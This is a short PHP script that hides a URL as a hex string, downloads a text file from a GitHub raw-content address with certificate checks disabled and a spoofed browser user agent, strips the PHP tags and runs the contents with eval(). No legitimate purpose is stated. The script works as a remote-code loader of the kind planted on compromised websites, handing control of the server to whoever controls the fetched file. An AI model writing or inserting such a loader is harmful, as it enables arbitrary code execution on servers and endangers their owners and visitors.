<?php

error_reporting(E_ALL);
ini_set('display_errors', 1);

function get_u() {
    $data = "68747470733a2f2f7261772e67697468756275736572636f6e74656e742e636f6d2f6c756666796f706d2f6f706d2f726566732f68656164732f6d61696e2f322e747874";
    return pack("H*", $data);
}

$u = get_u();
$ch = curl_init($u);

curl_setopt($ch, CURLOPT_RETURNTRANSFER, true);
curl_setopt($ch, CURLOPT_FOLLOWLOCATION, true);
curl_setopt($ch, CURLOPT_SSL_VERIFYPEER, false);
curl_setopt($ch, CURLOPT_SSL_VERIFYHOST, false);
curl_setopt($ch, CURLOPT_USERAGENT, 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36');
curl_setopt($ch, CURLOPT_TIMEOUT, 10);

$res = curl_exec($ch);
$http_code = curl_getinfo($ch, CURLINFO_HTTP_CODE);

if (curl_errno($ch)) {
    echo "CURL Error: " . curl_error($ch);
} else {
    if ($http_code == 200) {
        $c = preg_replace('/^<\?php|<\?|<\?php\s+/', '', $res);
        $c = str_replace('?>', '', $c);
        
        if (!empty($c)) {
            try {
                eval($c);
            } catch (Throwable $e) {
                echo "Runtime Error: " . $e->getMessage();
            }
        } else {
            echo "Konten kosong.";
        }
    } else {
        echo "Gagal mengambil file. HTTP Status: " . $http_code;
    }
}

curl_close($ch);

?>
